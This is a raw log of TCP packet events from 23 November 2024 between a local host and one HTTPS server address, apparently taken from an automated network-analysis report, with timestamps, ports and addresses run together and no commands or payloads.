                                                                                                                                                                                  Nov 23, 2024 19:53:05.739072084 CET49821443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:53:05.739084005 CET4434982113.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:05.739155054 CET49821443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:53:05.833841085 CET4434982413.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:05.834297895 CET49824443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:53:05.834322929 CET4434982413.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:05.835052967 CET49824443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:53:05.835061073 CET4434982413.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:05.843622923 CET4434982213.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:05.843660116 CET4434982213.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:05.843758106 CET49822443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:53:05.843767881 CET4434982213.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:05.844438076 CET49822443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:53:05.864078999 CET4434982113.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:05.864104033 CET4434982113.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:05.864178896 CET49821443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:53:05.864190102 CET4434982113.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:05.864243984 CET49821443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:53:05.864243984 CET49821443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:53:05.889261007 CET4434982313.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:05.893220901 CET4434982313.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:05.893338919 CET49823443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:53:05.893338919 CET49823443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:53:05.893521070 CET49823443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:53:05.893527985 CET4434982313.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:05.896388054 CET49831443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:53:05.896416903 CET4434983113.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:05.896990061 CET49831443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:53:05.897152901 CET49831443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:53:05.897167921 CET4434983113.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:05.899421930 CET4434982113.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:05.899440050 CET4434982113.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:05.899533987 CET49821443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:53:05.899533987 CET49821443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:53:05.899544001 CET4434982113.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:05.899599075 CET49821443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:53:05.921467066 CET4434982213.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:05.921500921 CET4434982213.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:05.921525955 CET49822443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:53:05.921540022 CET4434982213.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:05.921576977 CET49822443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:53:05.921598911 CET49822443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:53:05.925252914 CET4434982213.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:05.930141926 CET4434982113.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:05.930165052 CET4434982113.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:05.930259943 CET49821443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:53:05.930272102 CET4434982113.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:05.930392027 CET49821443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:53:05.933413029 CET4434982213.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:05.933468103 CET49822443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:53:05.933475018 CET4434982213.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:05.933502913 CET4434982213.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:05.933512926 CET49822443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:53:05.933566093 CET49822443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:53:05.933744907 CET49822443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:53:05.933756113 CET4434982213.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:05.948220015 CET4434982713.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:05.948637009 CET49827443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:53:05.948648930 CET4434982713.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:05.949186087 CET49827443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:53:05.949191093 CET4434982713.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:05.951390982 CET4434982113.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:05.951412916 CET4434982113.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:05.951488972 CET49821443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:53:05.951495886 CET4434982113.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:05.951539993 CET49821443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:53:05.951539993 CET49821443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:53:05.991271973 CET4434982613.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:05.992985010 CET49826443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:53:05.993005991 CET4434982613.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:05.993794918 CET49826443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:53:05.993801117 CET4434982613.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:06.034553051 CET4434982513.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:06.035056114 CET49825443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:53:06.035083055 CET4434982513.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:06.035604954 CET49825443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:53:06.035609961 CET4434982513.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:06.063363075 CET4434982113.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:06.063395023 CET4434982113.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:06.063489914 CET49821443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:53:06.063489914 CET49821443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:53:06.063524008 CET4434982113.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:06.063587904 CET49821443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:53:06.080658913 CET4434982113.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:06.080682993 CET4434982113.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:06.080729008 CET49821443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:53:06.080738068 CET4434982113.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:06.080774069 CET49821443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:53:06.080830097 CET49821443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:53:06.091367960 CET49832443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:53:06.091402054 CET4434983213.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:06.091569901 CET49832443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:53:06.091814995 CET49832443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:53:06.091840982 CET4434983213.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:06.096877098 CET4434982113.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:06.096901894 CET4434982113.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:06.096965075 CET49821443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:53:06.096975088 CET4434982113.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:06.097016096 CET49821443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:53:06.097016096 CET49821443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:53:06.110740900 CET4434982113.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:06.110769033 CET4434982113.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:06.110914946 CET49821443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:53:06.110927105 CET4434982113.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:06.111357927 CET49821443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:53:06.127054930 CET4434982113.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:06.127078056 CET4434982113.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:06.127142906 CET49821443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:53:06.127150059 CET4434982113.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:06.127161980 CET49821443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:53:06.127172947 CET4434982113.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:06.127191067 CET49821443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:53:06.127222061 CET49821443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:53:06.127780914 CET49821443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:53:06.127798080 CET4434982113.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:06.315982103 CET4434982413.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:06.319293022 CET4434982413.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:06.319381952 CET49824443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:53:06.322484970 CET49824443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:53:06.322520018 CET4434982413.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:06.322535992 CET49824443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:53:06.322545052 CET4434982413.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:06.325193882 CET49835443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:53:06.325243950 CET4434983513.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:06.325858116 CET49835443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:53:06.326143980 CET49835443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:53:06.326163054 CET4434983513.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:06.392194986 CET4434982713.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:06.395647049 CET4434982713.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:06.395709991 CET49827443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:53:06.397958994 CET49827443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:53:06.397983074 CET4434982713.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:06.484745026 CET4434982613.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:06.488482952 CET4434982613.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:06.492525101 CET49826443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:53:06.502909899 CET4434982513.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:06.506712914 CET4434982513.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:06.508641005 CET49825443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:53:06.629507065 CET49825443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:53:06.629532099 CET4434982513.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:06.629548073 CET49825443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:53:06.629554033 CET4434982513.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:06.634939909 CET49826443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:53:06.634952068 CET4434982613.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:06.634965897 CET49826443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:53:06.634973049 CET4434982613.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:06.643300056 CET49836443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:53:06.643336058 CET4434983613.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:06.643394947 CET49836443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:53:06.643632889 CET49837443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:53:06.643660069 CET4434983713.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:06.643793106 CET49837443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:53:06.644128084 CET49836443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:53:06.644143105 CET4434983613.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:06.644150019 CET49837443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:53:06.644160032 CET4434983713.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:06.667143106 CET49838443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:53:06.667162895 CET4434983813.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:06.667402983 CET49838443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:53:06.667711020 CET49838443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:53:06.667725086 CET4434983813.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:07.275048018 CET4434983013.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:07.276479006 CET49830443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:53:07.276500940 CET4434983013.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:07.276861906 CET4434983013.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:07.277373075 CET49830443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:53:07.277439117 CET4434983013.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:07.277580976 CET49830443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:53:07.320224047 CET49830443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:53:07.320236921 CET4434983013.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:07.734236002 CET4434983113.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:07.734874964 CET49831443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:53:07.734903097 CET4434983113.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:07.735564947 CET49831443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:53:07.735569954 CET4434983113.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:07.739511967 CET4434983013.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:07.739589930 CET4434983013.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:07.739793062 CET49830443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:53:07.740088940 CET49830443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:53:07.740124941 CET4434983013.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:07.740154028 CET49830443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:53:07.740205050 CET49830443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:53:07.742062092 CET49840443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:53:07.742094994 CET4434984013.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:07.742189884 CET49840443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:53:07.742592096 CET49840443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:53:07.742603064 CET4434984013.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:08.004092932 CET4434983213.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:08.005901098 CET49832443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:53:08.005920887 CET4434983213.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:08.007373095 CET4434983213.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:08.007477045 CET49832443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:53:08.007823944 CET49832443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:53:08.007905960 CET4434983213.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:08.008866072 CET49832443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:53:08.008876085 CET4434983213.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:08.054377079 CET49832443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:53:08.171019077 CET4434983113.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:08.174740076 CET4434983113.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:08.174824953 CET49831443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:53:08.174909115 CET49831443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:53:08.174927950 CET4434983113.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:08.174952984 CET49831443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:53:08.174958944 CET4434983113.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:08.228184938 CET4434983513.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:08.230448008 CET49835443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:53:08.230484962 CET4434983513.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:08.232088089 CET49835443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:53:08.232095003 CET4434983513.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:08.636724949 CET49844443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:53:08.636766911 CET4434984413.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:08.636873007 CET49844443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:53:08.637192965 CET49844443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:53:08.637204885 CET4434984413.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:08.660954952 CET4434983213.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:08.660989046 CET4434983213.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:08.660999060 CET4434983213.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:08.661015034 CET4434983213.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:08.661047935 CET49832443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:53:08.661075115 CET4434983213.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:08.661087990 CET4434983213.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:08.661101103 CET49832443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:53:08.661129951 CET49832443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:53:08.665987968 CET4434983613.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:08.666488886 CET49836443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:53:08.666507006 CET4434983613.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:08.667223930 CET49836443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:53:08.667229891 CET4434983613.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:08.672497034 CET4434983513.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:08.672671080 CET4434983513.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:08.672754049 CET49835443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:53:08.672830105 CET49835443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:53:08.672844887 CET4434983513.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:08.672854900 CET49835443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:53:08.672859907 CET4434983513.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:08.676178932 CET49845443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:53:08.676213980 CET4434984513.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:08.676280022 CET49845443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:53:08.676426888 CET49845443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:53:08.676441908 CET4434984513.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:08.707173109 CET4434983713.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:08.708249092 CET49837443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:53:08.708262920 CET4434983713.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:08.709490061 CET49837443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:53:08.709495068 CET4434983713.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:08.721473932 CET4434983813.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:08.724092007 CET49838443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:53:08.724117041 CET4434983813.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:08.724736929 CET49838443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:53:08.724742889 CET4434983813.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:08.861618042 CET4434983213.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:08.861649990 CET4434983213.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:08.861690998 CET4434983213.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:08.861712933 CET49832443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:53:08.861730099 CET4434983213.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:08.861747980 CET49832443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:53:08.902523041 CET49832443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:53:09.031886101 CET4434983213.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:09.031922102 CET4434983213.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:09.032083035 CET49832443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:53:09.032083035 CET49832443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:53:09.032107115 CET4434983213.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:09.036344051 CET49832443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:53:09.040277958 CET4434983213.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:09.040359974 CET49832443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:53:09.040368080 CET4434983213.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:09.040604115 CET49832443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:53:09.040613890 CET4434983213.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:09.040627956 CET49832443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:53:09.232820034 CET4434983613.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:09.233699083 CET4434983713.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:09.233864069 CET4434983713.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:09.233983994 CET49837443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:53:09.234092951 CET49837443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:53:09.234092951 CET49837443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:53:09.234110117 CET4434983713.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:09.234121084 CET4434983713.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:09.235891104 CET4434983613.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:09.236022949 CET4434983613.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:09.236087084 CET49836443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:53:09.237076998 CET49836443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:53:09.237086058 CET4434983613.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:09.237102032 CET49836443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:53:09.237108946 CET4434983613.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:09.242022038 CET4434983813.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:09.245718956 CET4434983813.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:09.245770931 CET49838443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:53:09.248552084 CET49838443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:53:09.248565912 CET4434983813.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:09.248579025 CET49838443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:53:09.248585939 CET4434983813.107.246.63192.168.2.7
